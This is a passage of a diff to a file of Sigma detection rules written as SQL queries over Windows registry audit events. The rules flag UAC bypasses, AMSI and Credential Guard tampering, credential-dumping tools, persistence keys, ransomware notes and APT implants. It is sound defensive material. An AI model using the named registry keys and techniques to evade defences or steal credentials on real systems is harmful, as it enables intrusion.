ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1137" + "attack.t1547.008" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Software installers downloaded and used by users" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detects persistence registry keys for Recycle Bin", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137.006" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ "attack.defense_evasion", - "attack.t1070.005" + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml" + }, + { + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", + "tags": [ + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + ], + "filename": "registry_event_mal_flowcloud.yml" + }, + { + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "falsepositives": [ + "Unlikely" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": 